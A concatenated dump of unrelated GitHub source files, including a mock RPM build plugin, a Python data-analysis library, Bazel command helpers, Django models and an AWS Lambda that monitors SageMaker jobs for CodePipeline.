\"/usr/share/mock-O0g3-plugin/g++-O0g3\",\n \"c++\": \"/usr/share/mock-O0g3-plugin/c++-O0g3\",\n \"strip\": \"/usr/share/mock-O0g3-plugin/strip-O0g3\",\n }\n self.suffix=\"O0g3\"\n \n # See http://www.redhat.com/archives/rpm-list/2003-February/msg00174.html\n root.yumInstall(\"redhat-rpm-config\")\n\n root.addHook(\"prebuild\", self.prebuild)\n root.addHook(\"postbuild\", self.postbuild)\n\n\n decorate(traceLog())\n def prebuild(self):\n self.modifySpec()\n for k in self.O0g3s:\n self.replace(k)\n\n decorate(traceLog())\n def postbuild(self):\n for k in self.O0g3s:\n self.revert(k)\n\n def modifySpec(self):\n getLog().info(\"Modify the spec file\")\n root = self.root\n specs = glob.glob(root.makeChrootPath(root.builddir, \"SPECS\", \"*.spec\"))\n spec = specs[0]\n chrootspec = spec.replace(root.makeChrootPath(), '') # get rid of rootdir prefix\n root.doChroot(\n [\"sed\", \"-i\", \n \"-e\", 's/^Release: .*/\\\\0.%s/'%(self.suffix), \n \"-e\", \"1i %define debug_package %{nil}\",\n \"-e\", \"1i %define debug_packages %{nil}\",\n \"-e\", \"1i %define __strip :\",\n chrootspec],\n shell=False,\n logger=root.build_log, \n timeout=0,\n uid=root.chrootuid,\n gid=root.chrootgid,\n )\n\n def makeOriginalPath(self, cmd):\n return self.root.makeChrootPath(\"/usr/bin\" + \"/\" + cmd)\n def makeBackupPath(self, cmd):\n return self.root.makeChrootPath(\"/usr/bin\" + \"/\" + \"_\" + cmd)\n\n def replace(self, cmd):\n getLog().info(\"Replace \" + cmd)\n root = self.root\n original = self.makeOriginalPath(cmd)\n backup = self.makeBackupPath(cmd)\n f = open(original, mode='r')\n l = f.readline() \n f.close()\n if l != \"#!/bin/bash\":\n try:\n root.uidManager.becomeUser(0, 0)\n getLog().info(\"mv \" + original + \" \" + backup)\n mockbuild.util.do([\"/bin/mv\", original, backup],\n shell=False)\n getLog().info(\"cp \" + self.O0g3s[cmd] + \" \" + original)\n mockbuild.util.do(\n [\"/bin/cp\", \n self.O0g3s[cmd],\n original],\n shell=False)\n finally:\n root.uidManager.restorePrivs()\n def revert(self, cmd):\n getLog().info(\"Revert \" + cmd)\n root = self.root\n original = self.makeOriginalPath(cmd)\n backup = self.makeBackupPath(cmd)\n if os.path.exists(backup):\n try:\n root.uidManager.becomeUser(0, 0)\n getLog().info(\"mv \" + backup + \" \" + original)\n mockbuild.util.do([\"/bin/mv\", backup, original],\n shell=False)\n finally:\n root.uidManager.restorePrivs()\n\n# mock --no-cleanup-after --resultdir=/tmp --enable-plugin=O0g3 -r epel-5-x86_64 --rebuild /srv/sources/attic/cradles/ftp.redhat.com/mirror/linux/enterprise/5Server/en/os/SRPMS/device-mapper-multipath-0.4.7-46.el5.src.rpm \n","repo_name":"hackerlank/svn-svn.code.sf.net-p-srpmix-code-","sub_path":"mock-O0g3-plugin/O0g3.py","file_name":"O0g3.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5453029508","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis file is part of NANOLIB\r\n\r\n\r\nNANOLIB was primarily developed at Nanosense by:\r\n Shidiq Nur Hidayat (s.hidayat@nanosense-id.com)\r\n\r\nCreated on Tue Jul 14 18:23:51 2020\r\n\r\n@author: Shidiq Nur Hidayat\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport warnings\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom nanolib.utils import customplot, train_test_split\r\n\r\n\r\nclass Stats:\r\n \"\"\"\r\n ===============================\r\n Data Manipulation and statistic\r\n 
===============================\r\n\r\n Stat(df, feature=int, key=string)\r\n\r\n Methods:\r\n\r\n - print_()\r\n - stats_()\r\n - corr_()\r\n - boxplot_()\r\n - matrixplot_()\r\n - swarmplot_()\r\n - stripplot_()\r\n - corrplot_(adj_left, adj_bottom, size)\r\n - dataframe_()\r\n - xy_()\r\n - xy_encoder(config=None)\r\n - xy_binarize()\r\n - signalmean(rot, adj_left, adj_bottom, scale)\r\n - signalminmaxmean()\r\n - saveinfo(file)\r\n - xy_split(encoder=False, binarized=False, test_size=0.2, random_state=None, config=None)\r\n - hierarchical_clustering(max_d)\r\n\r\n \"\"\"\r\n\r\n def __init__(self, df, feature=2, key='label'):\r\n self.feature = feature\r\n self.key = key\r\n featurename = list(df)[0:self.feature]\r\n featurename.append(self.key)\r\n self.df = df[featurename]\r\n self.df = self.df.sort_values(by=[self.key])\r\n self.X = self.df.values[:, 0:self.feature].astype(float)\r\n self.y = self.df[self.key].values\r\n self.case = None\r\n\r\n def __repr__(self):\r\n return 'You must understand your data in order to get the best results.\\n'\r\n\r\n def print_(self):\r\n # Dimensions of Your Data\r\n print('Understand Your Data\\n\\n')\r\n print(f'Dimensions of Your Data\\n'\r\n f'Number of rows : {self.df.shape[0]}\\n'\r\n f'Number of columns : {self.df.shape[1]}\\n\\n')\r\n\r\n # Data Type For Each Attribute\r\n print(f'Data Type For Each Attribute\\n'\r\n f'{self.df.dtypes}\\n\\n')\r\n\r\n # Descriptive Statistics\r\n print(f'Descriptive Statistics\\n'\r\n f'{self.df.describe()}\\n\\n')\r\n\r\n # Class Distribution\r\n print(f'Class Distribution\\n'\r\n f'{self.df.groupby(self.key).size()}\\n\\n')\r\n\r\n # Correlations Between Attributes\r\n pd.set_option('display.width', 100)\r\n pd.set_option('precision', 3)\r\n correlations = self.df.corr(method='pearson')\r\n print(f'Correlations Between Attributes\\n'\r\n f'{correlations}\\n\\n')\r\n\r\n # Skew of Univariate Distributions\r\n print(f'Skew of Univariate Distributions\\n'\r\n f'{self.df.skew()}\\n\\n')\r\n\r\n def stats_(self):\r\n return self.df.describe()\r\n\r\n def corr_(self):\r\n return self.df.corr(method='pearson')\r\n\r\n def boxplot_(self, separate=False, adj_left=.1, adj_bottom=.1):\r\n if separate:\r\n params = {'font.family': 'serif',\r\n 'font.serif': 'DejaVu Serif',\r\n 'xtick.labelsize': 20,\r\n 'ytick.labelsize': 20,\r\n 'axes.labelsize': 28,\r\n 'figure.figsize': [10.72, 8.205],\r\n 'legend.loc': 'best',\r\n 'legend.fontsize': 18,\r\n 'legend.fancybox': False}\r\n matplotlib.rcParams.update(params)\r\n self.df.groupby(self.key).boxplot()\r\n else:\r\n customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n dd = pd.melt(self.df, id_vars=[self.key], value_vars=list(self.df)[0:self.feature], var_name='Features')\r\n ax = sns.boxplot(x=self.key, y='value', data=dd, hue='Features')\r\n return ax.get_figure()\r\n\r\n def matrixplot_(self, adj_left=.1, adj_bottom=.1):\r\n fig, _ = customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n matplotlib.pyplot.close()\r\n fig = sns.pairplot(self.df, hue=self.key)\r\n return fig\r\n\r\n def swarmplot_(self, adj_left=.1, adj_bottom=.1):\r\n customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n dd = pd.melt(self.df, [self.key], var_name='Features')\r\n ax = sns.swarmplot(x='Features', y='value', data=dd, hue=self.key)\r\n return ax.get_figure()\r\n\r\n def stripplot_(self, adj_left=.1, adj_bottom=.1):\r\n dd = pd.melt(self.df, [self.key], var_name='Features')\r\n customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n sns.stripplot(x=\"value\", y=\"Features\", 
hue=self.key,\r\n data=dd, dodge=True, jitter=True,\r\n alpha=.25, zorder=1)\r\n ax = sns.pointplot(x=\"value\", y=\"Features\", hue=self.key,\r\n data=dd, dodge=.532, join=False, palette=\"dark\",\r\n markers=\"d\", scale=.75, ci=None)\r\n handles, labels = ax.get_legend_handles_labels()\r\n n = len(np.unique(self.y))\r\n ax.legend(handles[0:n], labels[0:n], loc='best',\r\n handletextpad=0, columnspacing=1,\r\n frameon=True)\r\n return ax.get_figure()\r\n\r\n def corrplot_(self, adj_left=.1, adj_bottom=.1, size=20):\r\n corr_ = self.df.corr(method='pearson')\r\n customplot(adj_bottom=adj_bottom, adj_left=adj_left)\r\n ax = sns.heatmap(corr_, vmax=1, vmin=-1, cmap='YlGnBu', annot=True, annot_kws={\"size\": size})\r\n return ax.get_figure()\r\n\r\n def dataframe_(self):\r\n return self.df\r\n\r\n def xy_(self):\r\n return self.X, self.y\r\n\r\n def xy_encoder(self, config=None):\r\n from sklearn.preprocessing import LabelEncoder\r\n \r\n if config is None:\r\n le = LabelEncoder()\r\n le.fit(list(self.df[self.key].unique()))\r\n y = le.transform(self.y)\r\n print(self.df[self.key].unique())\r\n print(np.unique(y))\r\n else:\r\n from sklearn.utils import column_or_1d\r\n \r\n class MyLabelEncoder(LabelEncoder):\r\n \r\n def fit(self, y):\r\n y = column_or_1d(y, warn=True)\r\n self.classes_ = pd.Series(y).unique()\r\n return self\r\n \r\n le = MyLabelEncoder()\r\n le.fit(config)\r\n y = le.transform(self.y)\r\n warnings.warn('User encoder activated')\r\n \r\n return self.X, y\r\n\r\n def xy_binarize(self):\r\n from sklearn.preprocessing import label_binarize\r\n y = label_binarize(self.y, classes=list(np.unique(self.y)))\r\n print(self.df[self.key].unique())\r\n return self.X, y\r\n\r\n def signalmean(self, rot=90, adj_left=0.14, adj_bottom=0.24, scale=False, median=False):\r\n label = self.df[self.key].unique()\r\n nama = list(self.df)[0:self.feature]\r\n mean_df = pd.DataFrame()\r\n scaling = StandardScaler()\r\n scaling.fit(self.df.values[:, 0:self.feature].astype(float))\r\n\r\n for i, item in enumerate(label):\r\n ind = self.df[self.key].isin([item])\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n \r\n if scale:\r\n temp[nama] = scaling.transform(temp[nama])\r\n\r\n if median:\r\n temp = temp.apply(np.median, axis=0)\r\n else:\r\n temp = temp.apply(np.mean, axis=0)\r\n\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n mean_df = mean_df.append(temp)\r\n\r\n mean_df = mean_df.transpose()\r\n params = {'font.family': 'serif',\r\n 'font.serif': 'DejaVu Serif',\r\n 'xtick.labelsize': 20,\r\n 'ytick.labelsize': 20,\r\n 'axes.labelsize': 28,\r\n 'figure.figsize': [10.72, 8.205],\r\n 'legend.loc': 'best',\r\n 'legend.fontsize': 18,\r\n 'legend.fancybox': False}\r\n matplotlib.rcParams.update(params)\r\n ax = mean_df[label].plot(kind='bar', legend=True, rot=rot)\r\n ax.set_xlabel('Features')\r\n ax.set_ylabel('Values')\r\n plt.subplots_adjust(left=adj_left, bottom=adj_bottom, right=.97, top=.97)\r\n\r\n return mean_df, ax.get_figure()\r\n\r\n def signalminmaxmean(self):\r\n label = self.df[self.key].unique()\r\n nama = list(self.df)[0:self.feature]\r\n minDF = pd.DataFrame()\r\n maxDF = pd.DataFrame()\r\n meanDF = pd.DataFrame()\r\n stdDF = pd.DataFrame()\r\n\r\n for i, item in enumerate(label):\r\n ind = self.df[self.key].isin([item])\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n temp = temp.apply(np.min, axis=0)\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n minDF = minDF.append(temp)\r\n\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n temp = 
temp.apply(np.max, axis=0)\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n maxDF = maxDF.append(temp)\r\n\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n temp = temp.apply(np.mean, axis=0)\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n meanDF = meanDF.append(temp)\r\n\r\n temp = self.df[ind]\r\n temp = temp[nama]\r\n temp = temp.apply(np.std, axis=0)\r\n temp = pd.DataFrame(data=temp, columns=[item]).transpose()\r\n stdDF = stdDF.append(temp)\r\n\r\n minDF = minDF.transpose()\r\n maxDF = maxDF.transpose()\r\n meanDF = meanDF.transpose()\r\n stdDF = stdDF.transpose()\r\n\r\n return minDF, meanDF, maxDF, stdDF\r\n\r\n def saveinfo(self, file='info.txt'):\r\n import io\r\n from contextlib import redirect_stdout\r\n import os\r\n\r\n path_ = os.path.dirname(file)\r\n if not os.path.exists(path_):\r\n os.makedirs(path_)\r\n\r\n f = io.StringIO()\r\n\r\n with open(file, 'w') as f:\r\n with redirect_stdout(f):\r\n self.print_()\r\n return f'Information saved in {file}'\r\n\r\n def xy_split(self, encoder=False, binarized=False, test_size=0.2, random_state=None, config=None):\r\n if encoder:\r\n x, y = self.xy_encoder(config=config)\r\n elif binarized:\r\n x, y = self.xy_binarize()\r\n else:\r\n x, y = self.xy_()\r\n\r\n xtrain, xtest, ytrain, ytest = train_test_split(x, y, test_size=test_size, random_state=random_state)\r\n \r\n return xtrain, xtest, ytrain, ytest\r\n\r\n def hierarchical_clustering(self, max_d=0):\r\n from scipy.cluster.hierarchy import dendrogram, linkage\r\n X = self.X\r\n linked = linkage(X, 'ward')\r\n labelList = np.arange(0, X.shape[0])\r\n fig, ax = customplot()\r\n dendrogram(linked,\r\n truncate_mode='lastp',\r\n p=X.shape[0],\r\n orientation='top',\r\n labels=labelList,\r\n distance_sort='descending',\r\n show_leaf_counts=True)\r\n plt.axhline(y=max_d, c='k')\r\n return ax.get_figure()\r\n\r\n\r\nclass KennardStone:\r\n \"\"\"\r\n =============================\r\n Kennard-Stone Algorithm Class\r\n =============================\r\n\r\n KennardStone(k)\r\n\r\n Methods:\r\n - fit(x, y)\r\n - datasplit()\r\n - print()\r\n\r\n \"\"\"\r\n\r\n def __init__(self, **options):\r\n self.X = None\r\n self.y = None\r\n self.k = options.get('k', 0)\r\n self.X_train = list()\r\n self.X_val = list()\r\n self.y_train = list()\r\n self.y_val = list()\r\n self.selectedsample = list()\r\n self.remainingsample = list()\r\n\r\n def __repr__(self):\r\n return f'{self.__class__.__name__}'\r\n\r\n def fit(self, x, y):\r\n self.X = x\r\n self.y = y\r\n x_variables = self.X\r\n k = self.k\r\n x_variables = np.array(x_variables)\r\n original_x = x_variables\r\n distance_to_average = ((x_variables - np.tile(x_variables.mean(axis=0), (x_variables.shape[0], 1))) ** 2).sum(\r\n axis=1)\r\n max_distance_sample_number = np.where(distance_to_average == np.max(distance_to_average))\r\n max_distance_sample_number = max_distance_sample_number[0][0]\r\n selected_sample_numbers = list()\r\n selected_sample_numbers.append(max_distance_sample_number)\r\n remaining_sample_numbers = np.arange(0, x_variables.shape[0], 1)\r\n x_variables = np.delete(x_variables, selected_sample_numbers, 0)\r\n remaining_sample_numbers = np.delete(remaining_sample_numbers, selected_sample_numbers, 0)\r\n for iteration in range(1, k):\r\n selected_samples = original_x[selected_sample_numbers, :]\r\n min_distance_to_selected_samples = list()\r\n for min_distance_calculation_number in range(0, x_variables.shape[0]):\r\n distance_to_selected_samples = (\r\n (selected_samples - 
np.tile(x_variables[min_distance_calculation_number, :],\r\n (selected_samples.shape[0], 1))) ** 2).sum(axis=1)\r\n min_distance_to_selected_samples.append(np.min(distance_to_selected_samples))\r\n max_distance_sample_number = np.where(\r\n min_distance_to_selected_samples == np.max(min_distance_to_selected_samples))\r\n max_distance_sample_number = max_distance_sample_number[0][0]\r\n selected_sample_numbers.append(remaining_sample_numbers[max_distance_sample_number])\r\n x_variables = np.delete(x_variables, max_distance_sample_number, 0)\r\n remaining_sample_numbers = np.delete(remaining_sample_numbers, max_distance_sample_number, 0)\r\n\r\n self.selectedsample = selected_sample_numbers\r\n self.remainingsample = remaining_sample_numbers\r\n return self.selectedsample, self.remainingsample\r\n\r\n def datasplit(self):\r\n self.X_train = self.X[self.remainingsample, :]\r\n self.y_train = self.y[self.remainingsample]\r\n\r\n self.X_val = self.X[self.selectedsample, :]\r\n self.y_val = self.y[self.selectedsample]\r\n\r\n dist_y_train = pd.DataFrame(self.y_train, columns=['Training'])['Training'].value_counts()\r\n dist_y_val = pd.DataFrame(self.y_val, columns=['Validation'])['Validation'].value_counts()\r\n print(dist_y_train)\r\n print(dist_y_val)\r\n\r\n return self.X_train, self.X_val, self.y_train, self.y_val\r\n\r\n def print(self):\r\n dist_y_train = pd.DataFrame(self.y_train, columns=['Training'])['Training'].value_counts()\r\n dist_y_val = pd.DataFrame(self.y_val, columns=['Validation'])['Validation'].value_counts()\r\n print(dist_y_train)\r\n print(dist_y_val)\r\n\r\n\r\nclass StatsMethod:\r\n \"\"\"\r\n =========================================================\r\n Statistic Hypothesis testing and Five-Number of statistic\r\n =========================================================\r\n\r\n StatsMethod()\r\n\r\n Methods:\r\n\r\n - nonparamsignificance(x1, x2)\r\n \r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.d1 = None\r\n self.d2 = None\r\n\r\n def nonparamsignificance(self, *arrays):\r\n from scipy.stats import mannwhitneyu, kruskal, wilcoxon\r\n import pingouin as pg\r\n\r\n self.d1 = arrays[0]\r\n self.d2 = arrays[1]\r\n metode = []\r\n p = []\r\n stat = []\r\n ket = []\r\n\r\n def keterangan(pval):\r\n alpha = 0.05\r\n if pval > alpha:\r\n return 'Same distribution (fail to reject H0)'\r\n else:\r\n return 'Different distribution (reject H0)'\r\n\r\n metode.append('Mann-Whitney U test')\r\n a, b = mannwhitneyu(self.d1, self.d2)\r\n stat.append(a)\r\n p.append(b)\r\n ket.append(keterangan(b))\r\n\r\n metode.append('Kruskal-Wallis H Test')\r\n a, b = kruskal(self.d1, self.d2)\r\n stat.append(a)\r\n p.append(b)\r\n ket.append(keterangan(b))\r\n\r\n metode.append('Wilcoxon')\r\n a, b = wilcoxon(self.d1, self.d2, correction=True)\r\n stat.append(a)\r\n p.append(b)\r\n ket.append(keterangan(b))\r\n\r\n results = {\r\n 'Method': metode,\r\n 'Statistic': stat,\r\n 'p-value': p,\r\n 'Conclusion': ket,\r\n }\r\n results = pd.DataFrame(results)\r\n print('5-Number of statistic for D1:')\r\n self.fivenumberplus(self.d1)\r\n\r\n print('5-Number of statistic for D2:')\r\n self.fivenumberplus(self.d2)\r\n\r\n print(results)\r\n print(pg.wilcoxon(self.d1, self.d2, tail='two-sided'))\r\n return results\r\n\r\n @staticmethod\r\n def fivenumberplus(x):\r\n from numpy import percentile\r\n Q = percentile(x, [25, 50, 75])\r\n print('Min : %.3f' % x.min())\r\n print('Q1 : %.3f' % Q[0])\r\n print('Median: %.3f' % Q[1])\r\n print('Q3 : %.3f' % Q[2])\r\n print('Max : %.3f' % x.max())\r\n print('Mean 
: %.3f' % x.mean())\r\n\r\n @staticmethod\r\n def multisignificancetest(A1, A2):\r\n\r\n def func(d1, d2, alpha=0.05):\r\n from scipy.stats import kruskal\r\n _, p = kruskal(d1, d2)\r\n if p > alpha:\r\n # same distribution (fail to reject H0)\r\n return 0\r\n else:\r\n # different distribution (reject H0 = H1)\r\n return 1\r\n\r\n m, n = A1.shape\r\n\r\n result = np.zeros((n, n))\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n temp = func(A1[:, i], A2[:, j])\r\n result[i, j] = temp\r\n\r\n label = [f'F{i}' for i in range(n)]\r\n result = pd.DataFrame(data=result, index=label, columns=label)\r\n\r\n plt.figure(figsize=(7, 7))\r\n sns.set(font_scale=2.0)\r\n ax = sns.heatmap(result, annot=True, cbar=False, annot_kws={'size': 20})\r\n\r\n return result, ax.get_figure()\r\n","repo_name":"Shidiq/nanolib","sub_path":"nanolib/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":18039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16087099780","text":"def execute_and_check_result(ctx, command, **kwargs):\n res = ctx.execute(command, **kwargs)\n if res.return_code != 0:\n fail(\"\"\"Failed to execute command: `{command}`{newline}Exit Code: {code}{newline}STDERR: {stderr}{newline}\"\"\".format(\n command = command,\n code = res.return_code,\n stderr = res.stderr,\n newline = \"\\n\"\n ))\n return res\n\n##\n# Runs a command and logs the result into a separate file\n#\ndef execute_log_action(repo_ctx, log_file_name, action, should_fail = False, **kwargs):\n cmd = \" \".join(action)\n repo_ctx.report_progress(\"Running {cmd}\".format(cmd = cmd))\n\n environment_str = \"\"\n if \"environment\" in kwargs:\n environment_str = \"\\nENV: {env}\".format(env = kwargs[\"environment\"])\n\n workdir_str = \"\"\n if \"working_directory\" in kwargs:\n workdir_str = \"\\nENV: {workdir}\".format(workdir = kwargs[\"working_directory\"])\n\n sh_path = repo_ctx.path(\"{log_file_name}.sh\".format(log_file_name = log_file_name))\n shell_script_lines = [\n \"#!/bin/bash\",\n \"unset GEM_HOME\",\n \"unset GEM_PATH\",\n cmd,\n \"\",\n ]\n exec_text = \"\\n\".join(shell_script_lines)\n\n repo_ctx.file(sh_path.basename, exec_text)\n \n res = repo_ctx.execute([\"%s\" % sh_path], **kwargs)\n result_str = \"cmd: {cmd}{env_str}{workdir_str}\\nRETCODE: {code}\\nSTDOUT:{stdout}\\nSTDERR:{stderr}\".format(\n cmd = cmd,\n env_str = environment_str,\n workdir_str = workdir_str,\n code = res.return_code,\n stdout = res.stdout,\n stderr = res.stderr,\n )\n\n if log_file_name:\n log_file_path = \"logs/commands/{log_file_name}\".format(log_file_name = log_file_name)\n repo_ctx.file(log_file_path, result_str)\n\n if should_fail and res.return_code:\n fail(\"Failed: {result_str}\". 
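The `KennardStone` class above selects the `k` most mutually distant samples by the max-min distance rule, then `datasplit` uses them as the validation set. A short usage sketch with synthetic data; it assumes the class is importable from `nanolib.eda`, as the repository layout suggests:

```python
import numpy as np
from nanolib.eda import KennardStone  # assumed import path

X = np.random.rand(50, 4)           # 50 synthetic samples, 4 features
y = np.repeat(['a', 'b'], 25)

ks = KennardStone(k=10)             # pick the 10 most spread-out samples
selected, remaining = ks.fit(X, y)
X_train, X_val, y_train, y_val = ks.datasplit()
print(len(selected), X_val.shape)   # 10 (10, 4)
```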
format(result_str = result_str))\n\n    return res, result_str\n","repo_name":"googleapis/gapic-generator-ruby","sub_path":"rules_ruby_gapic/ruby/private/utils.bzl","file_name":"utils.bzl","file_ext":"bzl","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"}
{"seq_id":"40021154155","text":"# http://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_image_display/py_image_display.html#display-image\n\nimport numpy as np\nimport cv2\n\n# Load a color image in grayscale\nimg = cv2.imread('panel.jpg',0)\n\ncv2.namedWindow('image', cv2.WINDOW_NORMAL)\n\ncv2.imshow('image',img)\nk = cv2.waitKey(0)\nif k == 27:         # wait for ESC key to exit\n    cv2.destroyAllWindows()\nelif k == ord('s'): # wait for 's' key to save and exit\n    cv2.imwrite('panelgray.png',img)\n    cv2.destroyAllWindows()","repo_name":"millerj870/onrsfrp2018","sub_path":"test-image.py","file_name":"test-image.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"23240837425","text":"# Given an integer array nums and an integer k, return the k-th largest element in the array.\n#\n# Note that it is the k-th largest element in sorted order, not the k-th distinct element.\n\n# Min-heap of size k\nfrom typing import List\nimport heapq\nclass Solution:\n    def findKthLargest(self, nums: List[int], k: int) -> int:\n        n = len(nums)\n        hp = nums[:k]\n        heapq.heapify(hp)\n        for i in range(k, n):\n            if nums[i] > hp[0]:\n                heapq.heappush(hp, nums[i])\n                if len(hp) > k:\n                    heapq.heappop(hp)\n        return hp[0]","repo_name":"vandeppce/algorithm","sub_path":"1.array/215*FindKthLargest.py","file_name":"215*FindKthLargest.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15750968098","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\nclass User(AbstractUser):\n    name = models.CharField(max_length=255, null=True)\n    email = models.EmailField(unique=True)\n    key = models.CharField(max_length=100000000000000000000000000000000000000000000000000000)\n    purchased = models.BooleanField(default=False)\n\n    USERNAME_FIELD = 'email'\n    REQUIRED_FIELDS = ['username', 'name', 'key', 'purchased']\n\nclass Product(models.Model):\n    name = models.CharField(max_length=1000)\n    link = models.URLField()\n    user = models.ForeignKey(User, blank=True, on_delete=models.CASCADE)\n    is_active = models.BooleanField(default=True)\n    description = models.TextField()\n    image = models.ImageField(blank=True, null=True, upload_to='products/')\n\n    def __str__(self):\n        return \"Product \" + str(self.id)\n\nclass Website(models.Model):\n    name = models.CharField(max_length=255, unique=True)\n    # header_title = models.CharField(max_length=255, default='')\n    # header_text = models.TextField(default='')\n    image1 = models.ImageField(upload_to='carousel/', default='')\n    image2 = models.ImageField(upload_to='carousel/', default='')\n    image3 = models.ImageField(upload_to='carousel/', default='')\n    products = models.ManyToManyField(Product, related_name=\"website_products\", blank=True)\n    user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n    def __str__(self):\n        return self.name","repo_name":"Nepul321/Affiliate-website-builder","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
{"seq_id":"17920089990","text":"import boto3\nimport os\nimport json\nimport tempfile\nimport botocore\n\nfrom boto3.session 
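The size-k min-heap in the kth-largest solution above keeps the k largest values seen so far, so the heap root `hp[0]` ends up being the k-th largest overall. For reference, the same result in two shorter forms: `heapq.nlargest` is O(n log k) like the loop, while full sorting is O(n log n).

```python
import heapq

nums, k = [3, 2, 1, 5, 6, 4], 2
print(heapq.nlargest(k, nums)[-1])   # 5
print(sorted(nums)[-k])              # 5
```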
import Session\n\nsagemaker = boto3.client('sagemaker')\ncode_pipeline = boto3.client('codepipeline')\n\nSSEKMSKeyId = os.environ['SSEKMSKeyIdIn']\n\n\ndef lambda_handler(event, context):\n try:\n \n previousStepEvent = read_job_info(event)\n print('[INFO]previousStepEvent info is:', previousStepEvent)\n jobName = previousStepEvent['job_name']\n print(\"[INFO]jobName is:\", jobName)\n \n \n eventText = event['CodePipeline.job']['data']['actionConfiguration']['configuration']['UserParameters']\n eventJson = json.loads(eventText)\n stage = eventJson['stage']\n print(\"[INFO]Stage is:\", stage)\n \n \n if stage == 'Training':\n name = jobName\n training_details = describe_training_job(name)\n status = training_details['TrainingJobStatus']\n print('[INFO]Training job is:', status)\n if status == 'Completed':\n #need to call success\n print('[SUCCESS]status is completed')\n print(training_details)\n s3_output_path = training_details['OutputDataConfig']['S3OutputPath']\n model_data_url = os.path.join(s3_output_path, name, 'output/model.tar.gz')\n event['message'] = 'Training job \"{}\" complete. Model data uploaded to \"{}\"'.format(name, model_data_url)\n event['model_data_url'] = model_data_url\n write_job_info_s3(event, training_details)\n put_job_success(event)\n elif status == 'Failed':\n #need to call failure\n print('[ERROR]status is failed')\n failure_reason = training_details['FailureReason']\n event['message'] = 'Training job failed. {}'.format(failure_reason)\n put_job_failure(event)\n elif status == 'InProgress':\n #need to call continue\n print('[INFO]status is still in process')\n continue_job_later(event, 'Training job still in process.') \n elif stage == 'Deployment':\n jobName = previousStepEvent['endpoint']\n print(\"[INFO]Deployment endpoint name is:\", jobName)\n endpoint_details = describe_endpoint(jobName)\n status = endpoint_details['EndpointStatus']\n print(\"[INFO]Deployment Status is:\", status)\n if status == 'InService':\n print('[SUCCESS]endpoint is in service')\n print(endpoint_details)\n event['message'] = 'Deployment completed for endpoint \"{}\".'.format(endpoint_details)\n put_job_success(event)\n elif status == 'Failed':\n failure_reason = endpoint_details['FailureReason']\n event['message'] = 'Deployment failed for endpoint \"{}\". 
{}'.format(jobName, failure_reason)\n elif status == 'RollingBack':\n event['message'] = 'Deployment failed for endpoint \"{}\", rolling back to previously deployed version.'.format(jobName)\n elif status == 'Creating':\n print('status is still in creating')\n continue_job_later(event, 'Endpoint Creation still in process.') \n event['status'] = status\n return event\n except Exception as e:\n print(e)\n event['message'] = str(e)\n put_job_failure(event)\n return 'failed'\n\n\ndef describe_training_job(name):\n \n try:\n response = sagemaker.describe_training_job(\n TrainingJobName=name\n )\n except Exception as e:\n print(e)\n print('[ERROR]Unable to describe training job.')\n raise(e)\n return response\n \ndef describe_endpoint(jobName):\n try:\n response = sagemaker.describe_endpoint(\n EndpointName=jobName\n )\n except Exception as e:\n print(e)\n print('[ERROR]Unable to describe endpoint.')\n raise(e)\n return response\n\ndef put_job_success(event):\n #need to add code to do the s3 upload of the information for the next stage.\n print('[INFO]Putting job success')\n print(event['message'])\n code_pipeline.put_job_success_result(jobId=event['CodePipeline.job']['id'])\n \ndef put_job_failure(event):\n \n print('[INFO]Putting job failure')\n print(event['message'])\n code_pipeline.put_job_failure_result(jobId=event['CodePipeline.job']['id'], failureDetails={'message': event['message'], 'type': 'JobFailed'})\n\ndef continue_job_later(event, message):\n \n \n # Use the continuation token to keep track of any job execution state\n # This data will be available when a new job is scheduled to continue the current execution\n continuation_token = json.dumps({'previous_job_id': event['CodePipeline.job']['id']})\n \n print('[INFO]Putting job continuation')\n print(message)\n code_pipeline.put_job_success_result(jobId=event['CodePipeline.job']['id'], continuationToken=continuation_token)\n\ndef read_job_info(event):\n\n tmp_file = tempfile.NamedTemporaryFile()\n\n objectKey = event['CodePipeline.job']['data']['inputArtifacts'][0]['location']['s3Location']['objectKey']\n print(\"[INFO]Object Key:\", objectKey)\n\n bucketname = event['CodePipeline.job']['data']['inputArtifacts'][0]['location']['s3Location']['bucketName']\n print(\"[INFO]Bucket Name:\", bucketname)\n\n artifactCredentials = event['CodePipeline.job']['data']['artifactCredentials']\n\n session = Session(aws_access_key_id=artifactCredentials['accessKeyId'],\n aws_secret_access_key=artifactCredentials['secretAccessKey'],\n aws_session_token=artifactCredentials['sessionToken'])\n \n \n s3 = session.resource('s3')\n\n obj = 